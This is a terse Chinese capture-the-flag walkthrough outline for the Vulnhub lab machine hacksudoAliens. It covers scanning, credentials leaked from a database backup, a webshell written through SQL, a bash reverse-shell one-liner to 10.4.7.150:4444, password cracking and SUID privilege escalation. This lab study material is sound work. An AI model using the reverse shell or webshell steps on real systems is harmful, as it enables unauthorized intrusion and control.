Vulnhub之hacksudoAliens

hacksudoAliens

一信息收集

IP 扫描

端口扫描

开放端口 22 80 9000

80 访问

扫描目录

访问backup

下载 查看mysql.bak

发现密码 账户

user=vishal password=hacksudo

提权

访问 9000 登录

用sql 写入木马 蚁件连接

反弹shell

bash -c 'exec bash -i &>/dev/tcp/10.4.7.150/4444 <&1'

kali

发现root密码但是加密了

爆破 把hacksudo 密码复制

登录ssh

查看权限和suid文件

查看二进制文件

提权方法

提权到root

查看flag